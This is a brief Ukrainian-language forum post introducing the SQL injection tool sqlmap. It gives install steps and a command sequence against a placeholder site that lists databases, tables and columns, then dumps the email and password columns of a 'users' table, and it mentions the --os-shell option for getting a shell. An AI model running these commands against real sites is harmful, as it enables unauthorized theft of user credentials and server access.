sqlmap

11

sqlmap — це платформна утиліта (ЯП: python), що дозволяє тестувати сайти на SQLi (SQL Injection) з величезним списком можливостей.

[#] — Для роботи вам потрібно завантажити інтерпретатор python, підійде як 2, так і 3 гілка.
[#] — http://sqlmap.org/ — посилання на офіційний сайт.
[#] — Дзеркало на скачку (остання версія, на момент посту) — скачати.
[#] — Після установки інтерпретатора, запустіть утиліту через cmd (Windows(WIN + R -> cmd -> cd C:\sqlmap -> python sqlmap.py або ж просто sqlmap.py)) або через Термінал (linux). Де C:\sqlmap — директорія, де лежить сам sqlmap.
[#] — Для havij-юзерів: sqlmap.py -u http://test.org/index.php?id=555 —dbs (після -u URL, команда —dbs витягує список БД. Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum —tables. -D поточна БД, —tables витягує з обраної БД (в нашому випадку з БД forum) список таблиць. Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users —columns. команда —columns витягує список колонок з обраної нами таблиці БД (в нашому випадку users). Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users -C email password —dump. Командою —dump дампим всі значення обраних нами колонок (у нашому випадку email і пароль) з таблиці).
[#] — Підтримує багатопоточність (до 10 потоків).
[#] — Завантаження міні-шелла (якщо дозволяють привілеї), командою —os-shell.
[#] — etc.
[#] — Мануал по софту на хабре.
[#] — Мануал по софту на ксакеп.ру.

sqlmap ШУП ТА ВНП

Скачать [sqlmap]

Скачать [python]